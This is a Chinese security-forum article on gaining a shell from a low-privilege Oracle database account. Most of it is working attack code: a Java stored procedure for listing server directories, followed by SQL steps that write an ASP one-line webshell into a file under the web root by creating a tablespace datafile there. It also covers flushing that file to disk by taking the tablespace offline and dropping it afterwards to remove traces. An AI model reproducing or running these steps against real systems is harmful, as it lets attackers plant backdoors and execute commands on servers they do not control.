首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>入侵实例>文章内容
oracle低权限下获取shell
来源:http://hi.baidu.com/hack_forensic 作者:forensic 发布时间:2010-12-20  

     转载请标明:http://hi.baidu.com/hack_forensic 

  《关于oracle列目录的可行性测试》

经过本人测试,确实可行,解决了 kj021320文章的遗憾,kj021320在文章<<ORACLE 建立数据文件WriteWebShell>>最后说,当然这个方法缺点就是你要知道WEB路径.少费话,直接贴code:

create global temporary table BLUEUSER.dirlist(
filename varchar2(255),
filesize number,
filedate date)
on commit delete rows;
/

create or replace and compile java source named DirList as
import java.io.*;
import java.sql.*;
public class DirList
{
public static void getList(String directory) throws SQLException
{
File path=new File(directory);
String[] fileList=path.list();
String fileName;
long fileSize;
long fileDate;
for (int i=0;i<fileList.length; i++)
{
fileName=fileList[i];
File fpath=new File(directory+’/'+fileName);
fileSize=fpath.length();
fileDate=fpath.lastModified();
#sql{insert into BLUEUSER.dirlist(filename, filesize, filedate)
values(:fileName,:fileSize,to_date(’01/01/1970′,’mm/dd/yyyy’)+:fileDate/(24*60*60*1000))};
}
}
}

CREATE OR REPLACE PROCEDURE BLUEUSER.p_get_dir_list(i_directory IN VARCHAR2) AS
LANGUAGE JAVA NAME ‘DirList.getList(java.lang.String)’;

SQL> exec BLUEUSER.p_get_dir_list(‘/tmp’);
PL/SQL procedure successfully completed

select * from BLUEUSER.dirlist;

select * from BLUEUSER.dirlist where rownum<150;
select filename from BLUEUSER.dirlist where rownum<150;
select filename from BLUEUSER.dirlist;

truncate table BLUEUSER.dirlist;     好啊 要不然是追加.

测试环境:oracle 9+redhat

——————ORACLE 建立数据文件WriteWebShell———————

SQLJ   存储过程写文件也可以,逼于无奈对方机器不支持SQLJ  还有  UTL_FILE包也被干掉了?

那 也可以 使用以下我说的这个方式

SQL> create tablespace kjtest datafile ‘e:\website\kj.asp’ size 100k nologging ;

表空间已创建。

这里记住了  100K为ORACLE 表空间最小的单位,如果你的一句话SHELL比较大 那可以200K比较稳妥

但是最终建议一句话一定要最最简洁

SQL> CREATE TABLE WEBSHELL(C varchar2(100)) tablespace kjtest;

表已创建。

一般用 VARCHAR类型已经可以 ,表空间太小了 ,所以不可以 为 CLOB或者 BLOB类型。

SQL> insert into WEBSHELL values(‘<%execute request(“kj021320″)%>’);

已创建 1 行。

SQL> commit;

提交完成。

提交完成之后就 OK? NO~ 因为数据还没有被 DBWn 进程刷到文件呢. 所以需要同步一下CKPT以及OFFLINE当前表空间

SQL> alter tablespace kjtest offline;

表空间已更改。

到这里 你的 一句话SHELL代码已经 写到 那个文件了

你会发现有这样的 <%execute request(“kj021320″)%>的 代码

一句话shell已经OK了

最后使用后记得吧 表空间删除

SQL> drop tablespace kjtest including contents;

表空间已删除。


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·另类网站入侵之一句话木马图片的
·0day批量拿站webshell,挖掘机是
·利用ewebeditor 5.5 - 6.0 鸡肋
·OmniPeek抓包的一点看法
·强大的嗅探工具ettercap使用教程
·Windows系统密码破解全攻略
·破解禁止SSID广播
·XSS偷取密码Cookies通用脚本
·XSS漏洞基本攻击代码
·Intel 3945ABG用OmniPeek 4.1抓
·KesionCMS V7.0科汛内容网站管理
·破解无线过滤MAC
  相关文章
·GRE数据包注入攻击
·暴力破解asp一句话[php版]
·时间和状态:利用漏洞改变游戏角
·另类网站入侵之一句话木马图片的
·通过后台抓包备份拿webshell渗透
·渗透技巧总结
·The Operation Outbreak Attack
·一次有意思的提权(G6FTP )
·Metasploit with MYSQL in BackT
·啊江统计系统V1.6 版本后台拿SHE
·Exploitation Without A TTY
·长达1年半的一次艰难渗透
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved